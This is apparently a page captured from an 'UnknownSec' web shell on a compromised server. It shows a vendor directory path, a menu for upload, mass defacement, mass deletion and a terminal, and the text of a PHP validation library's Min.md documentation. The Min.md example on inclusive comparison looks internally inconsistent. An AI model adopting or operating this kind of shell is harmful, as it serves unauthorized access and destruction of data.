UnknownSec Bypass
403
:
/
mnt
/
lmsestudio-instance-vol002
/
lms_a852e4e4c22f
/
vendor
/
respect
/
validation
/
docs
/
rules
/ [
drwxr-xr-x
]
Menu
Upload
Mass depes
Mass delete
Terminal
Info server
About
name :
Min.md
# Min - `v::min(mixed $minValue)` - `v::min(mixed $minValue, boolean $inclusive = true)` Validates if the input is greater than the minimum value. ```php v::intVal()->min(15)->validate(5); // false v::intVal()->min(5)->validate(5); // false v::intVal()->min(5, true)->validate(5); // true ``` Also accepts dates: ```php v::date()->min('2012-01-01')->validate('2015-01-01'); // true ``` `true` may be passed as a parameter to indicate that inclusive values must be used. Message template for this validator includes `{{minValue}}`. *** See also: * [Max](Max.md) * [Between](Between.md)
Copyright © 2026 - UnknownSec